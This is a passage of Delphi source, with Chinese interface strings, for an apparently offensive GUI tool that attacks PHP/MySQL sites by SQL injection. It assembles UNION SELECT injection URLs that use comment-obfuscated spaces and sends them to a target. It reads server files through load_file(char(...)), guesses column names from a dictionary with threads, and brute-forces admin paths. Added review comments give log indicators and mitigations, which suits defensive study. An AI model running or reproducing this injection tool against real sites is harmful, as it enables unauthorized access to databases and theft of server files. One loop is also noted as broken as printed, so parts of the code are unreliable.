p; end;
mm.lines.add('');
mm.lines.add('字段猜解结束。。。');
// sbscan2.caption :='猜解';
end;
except
end;
isfinish :=true;
end;
procedure tform1.fieldthreadexit(sender: tobject);
// Completion callback for one field-guessing worker (presumably assigned as a
// thread's OnTerminate handler; the assignment is not in this part of the file).
// Each call counts one finished worker in n and advances the progress bar. Once
// n equals the number of dictionary entries, the run is reported as finished in
// the log memo and the controls are put back into their idle state.
begin
  inc(n);
  pg1.stepit;

  // Workers are still outstanding: nothing else to do yet.
  if n <> lsbdict.count then
    exit;

  // isfinish = false is the state in which sbscan3click starts a new run.
  isfinish := false;
  mm.lines.add('');
  mm.lines.add('字段猜解结束。。。');   // log text: "field guessing finished..."
  pg1.visible := false;
  sbscan2.caption := '猜解';            // button label: "guess"
end;
procedure tform1.lvfieldclick(sender: tobject);
// Copies a row of the field list into one of the two column slots used when
// the query string is assembled: the row captioned '1' fills slot 1, any other
// row fills slot 2.
// NOTE(review): lvfield.selected is dereferenced without a nil check; if the
// click leaves no row selected this raises an access violation - confirm
// whether the event can fire in that state.
begin
  if lvfield.selected.caption <> '1' then
  begin
    // Any other row: take the text and position from the selected item.
    edtfield2.text := lvfield.selected.subitems.gettext;
    spfield2.text := lvfield.selected.caption;
  end
  else
  begin
    // Row '1': the values are read from items[0], not from the selected item.
    edtfield1.text := lvfield.items[0].subitems.gettext;
    spfield1.text := lvfield.items[0].caption;
  end;
end;
procedure tform1.lvtableclick(sender: tobject);
// Puts the sub-item text of the clicked table-list row into the table-name
// edit box, from where sbrecordclick later reads it.
// NOTE(review): lvtable.selected is used without a nil check - confirm the
// event cannot fire with no row selected.
begin
  edttable.text := lvtable.selected.subitems.gettext;
end;
procedure tform1.sbrecordclick(sender: tobject);
// Builds a UNION SELECT query string from the form fields, appends it to the
// global url, logs the result in mm and, when get() reports true, opens it in
// wb and switches the page control to tab index 3.
//
// Inputs read from the form: edtfieldnum (column count), spfield1/spfield2
// (column positions), edtfield1/edtfield2 (column names), edttable (table
// name), edtid (where clause). All of them are concatenated as typed.
//
// Defender view: the request this produces carries '/**/' in place of every
// space, the sequence 'and 1=2 union select' and a trailing '/*'. Those
// substrings in a query string are a useful indicator in web-server logs and
// WAF rules. The request has an effect only where the target page concatenates
// the parameter into its SQL statement; bound parameters remove that.
var i:integer;
begin
istr :='';
// strtoint raises EConvertError on non-numeric text; nothing in this
// procedure catches it.
for i:=1 to strtoint(edtfieldnum.text) do
begin
// Position spfield1 gets the first column name, position spfield2 the second,
// every other position gets its own index as a numeric filler.
if i=strtoint(spfield1.text) then
istr :=istr+','+trim(edtfield1.text)
else if i=strtoint(spfield2.text) then
istr :=istr+','+trim(edtfield2.text)
else istr :=istr+','+inttostr(i);
end;
// Drop the leading comma left by the loop.
if istr<>'' then
istr :=copy(istr,2,length(istr)-1);
injurl :=url+'/**/and/**/1=2/**/union/**/select/**/'+istr
+'/**/from/**/'+trim(edttable.text)+'/**/where/**/'+trim(edtid.text)+'/*';
mm.lines.add(injurl);
// get() is defined elsewhere in the file; presumably it issues the HTTP
// request and returns whether it succeeded - confirm against its definition.
if get(injurl,'') then
begin
// NOTE(review): wb looks like an embedded browser control, so the remote
// response is rendered inside this process - confirm and treat that content
// as untrusted.
wb.navigate(injurl);
pcphpinj.activepageindex :=3;
end;
end;
procedure tform1.sbfileclick(sender: tobject);
// Builds a UNION SELECT query string whose column at position spnum is a
// load_file(char(...)) expression for the file name in edtfilename, appends it
// to the global url, logs it in mm and, when get() reports true, opens it in
// wb and switches the page control to tab index 3.
//
// Defender view: 'load_file(char(' together with '/**/union/**/select/**/' in
// a query string is a log indicator for this request. load_file only returns
// data when the database account holds the MySQL FILE privilege and the path
// is permitted by secure_file_priv, so an application account without FILE
// limits the impact even where the page itself is injectable.
var i,j:integer;
str,fname:string;
begin
if edtfilename.text='' then
begin
// Message text: "Please enter the file name to guess!"
msgbox('请输入要猜解的文件名!');
exit;
end;
fname :=trim(edtfilename.text);
istr :='';
for i:=1 to length(fname) do
begin
// NOTE(review): ord() is applied to the whole string here and the loop index
// i is not used; as shown this does not compile. An index may have been lost
// when the listing was published - confirm against the original file.
istr :=istr+','+ inttostr(ord(fname));
end;
if istr<>'' then
begin
// Drop the leading comma, then wrap the code list in load_file(char(...)).
istr :=copy(istr,2,length(istr)-1);
istr :='load_file(char('+istr+'))';
end;
str :='';
// strtoint raises EConvertError on non-numeric text; nothing in this
// procedure catches it.
for j:=1 to strtoint(edtfieldnum.text) do
begin
// Position spnum carries the expression built above; every other position
// gets its own index as a numeric filler.
if j=strtoint(spnum.text) then
str :=str+','+istr
else str :=str+','+inttostr(j);
end;
// Drop the leading comma left by the loop.
if str<>'' then
str :=copy(str,2,length(str)-1);
injurl :=url+'/**/and/**/1=2/**/union/**/select/**/'+str+'/*';
mm.lines.add(injurl);
// get() is defined elsewhere in the file; presumably it issues the HTTP
// request and returns whether it succeeded - confirm against its definition.
if get(injurl,'') then
begin
wb.navigate(injurl);
pcphpinj.activepageindex :=3;
end;
end;
procedure tform1.sbstop2click(sender: tobject);
// Stop-button handler: the only live statement sets the shared isfinish flag
// to true. Whether the worker threads poll that flag is not visible in this
// part of the file.
// The local i is referenced only by the disabled block below.
var i:integer;
begin
isfinish :=true;
// Disabled code kept as in the original: it suspended and freed each remaining
// scanfield thread from index n onward and logged the end of the run.
{ if n>=lsbdict.count then exit;
for i:=n to lsbdict.count-1 do
begin
if scanfield.freeonterminate then
begin
scanfield.suspend;
scanfield.free;
end;
end;
mm.lines.add('');
mm.lines.add('字段猜解结束。。。'); }
end;
procedure tform1.sbscan3click(sender: tobject);
var
i,ipos,sum:integer;
begin
if isfinish=false then
begin
url :=trim(edtinjurl.text);
if pos('http://',url)>0 then
begin
url :=copy(url,8,length(url)-7);
ipos :=pos('/',url)
end else
ipos :=pos('/',url);
url :='http://'+copy(url,1,ipos-1);
if url='' then exit;
lsbdict.items.clear;
listbox1.items.clear;
mm.lines.clear;
m :=0;
lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_manager.txt');
sum :=lsbdict.count;
pg1.min :=0;
pg1.max :=sum;
pg1.step :=1;
pg1.position :=0;
pg1.visible :=true;
mm.lines.add('开始猜解后台路径。。。');
mm.lines.add('');
setlength(scanmanager,sum); // 动态设置线程的数量
////开始扫描后台路径
for i:=0 to sum-1 do
begin
scanmanager := scanmanagerthread.create(url,i,listbox1,mm);
scanmanager.onterminate := managerthreadexit;
end;
end;
if isfinish=true then
begin
try
for i:=m to lsbdict.count-1 do
begin
if scanmanager.freeonterminate then
begin
scanmanager.suspend;